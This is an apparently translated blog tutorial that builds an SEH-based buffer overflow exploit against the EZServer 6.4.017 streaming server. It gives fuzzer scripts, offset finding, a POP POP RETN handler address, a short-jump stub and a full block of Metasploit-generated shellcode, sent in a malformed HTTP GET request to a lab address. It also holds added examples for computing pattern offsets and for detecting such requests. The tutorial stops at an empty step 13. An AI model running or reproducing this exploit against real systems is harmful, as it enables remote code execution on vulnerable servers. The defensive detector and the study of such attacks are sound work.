Monday, October 1, 2012

BUFFER OVERFLOW (SEH): EZSERVER (6.4.017)

In this section I take a look at the EZServer application, version 6.4.017. Let's hunt:

1. Analyse the application to find the attack vector.
     ==> EZServer is an application for streaming multimedia files (movies etc.), which is accessed at
             url : http://url:8000/admin/index.html
     ==> So we can test it with a fuzzer through the URL, but we must first know a request header
             that the server does not reject.
This is my screenshot of EZServer showing information about the application:

2. Look at the request header with Wireshark.
    ==> Follow ==> Follow TCP Stream.


The request line is ==> GET /....... HTTP/1.1
So I can put the buffer in the path ==> GET /<buffer>. HTTP/1.1

3. Create a fuzzer in Python ==> fuzzer.py.
#!/usr/bin/python
import socket

target_address = "192.168.56.101"
target_port = 8000
#target_url = "/admin/index.html"
buffer = "\x41" * 8000    # 8000 x 'A' placed in the request path

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
# same request line as captured in Wireshark, with the buffer as the path
request = "GET /" + buffer + "HTTP/1.1\r\n\r\n\r\n"
if not isinstance(request, bytes):    # Python 3: str -> raw bytes
    request = request.encode("latin-1")
sock.send(request)
print("kirim")    # "sent"
sock.close()


4. Run the fuzzer and watch the effect in OllyDbg ==> # python fuzzer.py
     ==> View SEH chain

   ==> Shift + F9 (pass the exception to the program)
     ==> EIP overwritten with 41414141

5.  Create a pattern with Metasploit to find the offset.

6.  Modify the fuzzer to send the pattern and find the offset.

#!/usr/bin/python
import socket

target_address = "192.168.56.101"
target_port = 8000
# cyclic pattern from step 5, 8000 bytes; truncated here
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8A.........."

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
request = "GET /" + buffer + "HTTP/1.1\r\n\r\n\r\n"
if not isinstance(request, bytes):    # Python 3: str -> raw bytes
    request = request.encode("latin-1")
sock.send(request)
print("kirim")    # "sent"
sock.close()

7. Read the value that overwrote EIP ==> check the offset with ==> pattern_offset.

        ==> Offset ==> 5883


8. Modify the fuzzer to control EIP.

#!/usr/bin/python
import socket

target_address = "192.168.56.101"
target_port = 8000
# offset 5883 is the SEH handler pointer, so the next-SEH pointer starts at 5879
buffer = "\x90" * 5879
buffer += "\xcc\xcc\xcc\xcc"     # nSEH: INT3 breakpoints
buffer += "\x41\x41\x41\x41"     # SEH handler: should show up as 41414141
buffer += "\x90" * (8000 - len(buffer))   # pad to the original 8000 bytes

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
request = "GET /" + buffer + "HTTP/1.1\r\n\r\n\r\n"
if not isinstance(request, bytes):    # Python 3: str -> raw bytes
    request = request.encode("latin-1")
sock.send(request)
print("kirim")    # "sent"
sock.close()


==> Run the fuzzer ==> view the SEH chain ==> Shift+F9

    ==> EIP overwritten ==> 41414141 (4 bytes)
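To see how the 5879 in step 8 follows from the 5883 that pattern_offset reports, here is an added Python 3 example (not from the post) that rebuilds the Metasploit-style cyclic pattern, looks up a debugger-displayed dword in it, and lays out the nSEH / handler / landing offsets. The dword 48316F48 is constructed (it is what 8000 bytes of the pattern put at offset 5883), since the post does not show the value read in step 7.

```python
import string

def cyclic_pattern(length):
    """Build the Metasploit-style pattern Aa0Aa1Aa2...Aa9Ab0... (period 20280)
    that pattern_create emits; 8000 bytes of it fill the step 6 fuzzer."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(dword_hex, length=8000):
    """Offset of the 4 pattern bytes that landed in the handler slot.
    dword_hex is the value as OllyDbg displays it (e.g. '48316F48'); x86 is
    little-endian, so the bytes in the buffer are in the reverse order."""
    needle = bytes.fromhex(dword_hex)[::-1]
    return cyclic_pattern(length).find(needle)   # -1 if not part of the pattern

def seh_layout(handler_offset, jmp_disp=6):
    """Where each field of the step 8/11 buffer goes, given the offset of the
    4-byte handler pointer reported by pattern_offset."""
    nseh = handler_offset - 4      # next-SEH pointer sits right before the handler
    # 'jmp short' is 2 bytes and its displacement counts from the following
    # instruction, so +6 lands just past the 4-byte handler pointer
    landing = nseh + 2 + jmp_disp
    return {"nseh": nseh, "handler": handler_offset, "shellcode": landing}

if __name__ == "__main__":
    # constructed dword: what 8000 bytes of this pattern put at offset 5883
    off = pattern_offset("48316F48")
    print(off, seh_layout(off))   # 5883 {'nseh': 5879, 'handler': 5883, 'shellcode': 5887}
```

The shellcode offset 5887 is exactly where the step 11 script starts its payload (5879 + 4 + 4).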

9. Look for a module to execute POP POP RETN

   ==> I will try the MSVCRTD.DLL module
   ==> Check with msfpescan whether the module was built with SafeSEH

10. Find a POP POP RETN address in MSVCRTD.DLL
       ==> Executable modules ==> double-click MSVCRTD.DLL ==> search for POP POP RETN

11.  Generate the payload with Metasploit ==> modify the fuzzer with a short jump (jmp short)

    ==> Modified fuzzer

#!/usr/bin/python
import socket

target_address = "192.168.56.101"
target_port = 8000
buffer = "\x90" * 5879           # NOP sled up to the next-SEH pointer
buffer += "\xeb\x06\x90\x90"     # nSEH: jmp short +6, over the handler pointer
buffer += "\x96\x96\x20\x10"     # SEH handler: POP POP RETN in MSVCRTD.DLL (0x10209696)
# Metasploit-generated payload follows; it runs after the short jump
buffer+=("\xb8\x64\xa6\xaa\x44\x2b\xc9\xdb\xd4\xd9\x74\x24\xf4\xb1\x51\x5b"
"\x31\x43\x10\x03\x43\x10\x83\x8f\x5a\x48\xb1\xb3\xc9\x66\x77\xa3"
"\xf7\x86\x77\xcc\x68\xf2\xe4\x16\x4d\x8f\xb0\x6a\x06\xf3\x3f\xea"
"\x19\xe3\xcb\x45\x02\x70\x94\x79\x33\x6d\x62\xf2\x07\xfa\x74\xea"
"\x59\x3c\xef\x5e\x1d\x7c\x64\x99\xdf\xb7\x88\xa4\x1d\xac\x67\x9d"
"\xf5\x17\xa0\x94\x10\xdc\xef\x72\xda\x08\x69\xf1\xd0\x85\xfd\x5a"
"\xf5\x18\xe9\x67\x29\x90\x64\x0b\x15\xba\x17\x10\x64\x19\xb3\x1d"
"\xc4\xad\xb7\x61\xc7\x46\xb7\x7d\x7a\xd3\x78\x75\xda\x8c\xf6\xcb"
"\xec\xa0\x57\x2c\x26\x5e\x0b\xb4\xaf\xac\x99\x50\x47\xa0\xef\xff"
"\xf3\xb9\xc0\x97\x30\xa8\x1d\x5c\x97\xcc\x08\xfd\x9e\xd6\xd3\x80"
"\x4c\x10\x1e\xd7\xe4\x23\xe1\x07\x90\xfa\x14\x52\xcc\xaa\xd9\x4a"
"\x5c\x06\x75\x21\x30\xeb\x2a\x86\xe5\x14\x1c\x6e\x62\xfa\xc1\x08"
"\x21\x75\x18\x41\xad\x21\xc1\x19\xe9\x7d\x09\x0f\x9f\x91\xa4\xfa"
"\x9f\x42\x2e\xa0\xcd\x4d\x46\xff\xf2\x44\xcb\xaa\xf3\xb9\x84\xb1"
"\x45\xbc\x1c\x6e\xa9\x16\xce\xc4\x01\xc2\x10\x34\x3a\x84\x09\xcd"
"\xfb\x2c\x81\xd2\xd2\x9a\xd2\xfc\xbd\x4e\x49\x9a\x29\xec\xfc\xeb"
"\x4f\x98\xae\xb2\xa6\x91\xc6\xa3\xd3\x6d\x50\xc9\x15\xae\x91\xa7"
"\xa8\x6c\x7b\x49\x16\x5d\x10\x38\xed\xa5\xbd\xe9\xb9\xbe\xb3\x13"
"\x0e\x28\xcb\x9e\x35\xaa\xe5\x3b\xe1\x06\x5b\xea\x5c\xcd\x5a\x5d"
"\x0e\x44\x0c\xa2\x60\x0e\x03\x85\x84\x01\x08\xca\x51\xf7\x50\xcb"
"\x69\xf7\x7f\xb8\xc1\xfb\x03\x7a\x89\xfc\xd2\xd0\xad\xd3\xb3\xaa"
"\x89\x36\x30\x01\xd5\x61\x48\x75")
buffer += "\x90" * (8000 - len(buffer))   # pad to the original 8000 bytes

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
request = "GET /" + buffer + "HTTP/1.1\r\n\r\n\r\n"
if not isinstance(request, bytes):    # Python 3: str -> raw bytes
    request = request.encode("latin-1")
sock.send(request)
print("kirim")    # "sent"
sock.close()

12.  Try running the exploit without OllyDbg.

        ==> The application crashes ==> try to telnet ==> doesn't work
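From the defender's side, the request the fuzzer sends has a recognisable shape: a request line missing its space before HTTP/1.1, a multi-kilobyte target made almost entirely of NOP bytes, and the jmp-short stub in the nSEH slot. The added Python 3 example below (not from the post) checks a raw request for those traits; the threshold constants and both sample requests are constructed assumptions, and the suspect sample uses a placeholder handler address and no shellcode.

```python
import re

# Assumptions (not from the post): a sane upper bound for this server's request
# target, and the minimum run length that counts as a NOP sled.
MAX_TARGET_LEN = 2048
NOP_SLED = re.compile(rb"\x90{32,}")
# the 2-byte 'jmp short +6' plus NOP padding that the post places in nSEH
NSEH_STUB = re.compile(rb"\xeb\x06\x90\x90")

def inspect_request(raw):
    """Return a list of findings for one raw HTTP request (bytes); empty = clean."""
    findings = []
    line = raw.split(b"\r\n", 1)[0]
    fields = line.split(b" ")
    # A valid request line has exactly three fields: METHOD SP target SP version.
    # The fuzzer's "GET /<buffer>HTTP/1.1" has only two.
    if len(fields) != 3 or not fields[-1].startswith(b"HTTP/"):
        findings.append("malformed request line")
    target = fields[1] if len(fields) > 1 else b""
    if len(target) > MAX_TARGET_LEN:
        findings.append("oversized target: %d bytes" % len(target))
    if target:
        nonprint = sum(1 for b in target if b < 0x20 or b > 0x7e)
        if nonprint * 2 > len(target):      # more than half the bytes are not printable ASCII
            findings.append("mostly non-printable target")
    if NOP_SLED.search(target):
        findings.append("NOP sled")
    if NSEH_STUB.search(target):
        findings.append("nSEH short-jump stub")
    return findings

# Constructed samples: a normal request for the admin page named in the post,
# and a request shaped like the step 11 fuzzer (sled, jmp-short stub, a
# placeholder "AAAA" instead of the handler address, no shellcode).
BENIGN = b"GET /admin/index.html HTTP/1.1\r\nHost: 192.168.56.101:8000\r\n\r\n"
SUSPECT = (b"GET /" + b"\x90" * 5879 + b"\xeb\x06\x90\x90" + b"AAAA"
           + b"\x90" * (8000 - 5887) + b"HTTP/1.1\r\n\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_request(req) or "clean")
```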

13.
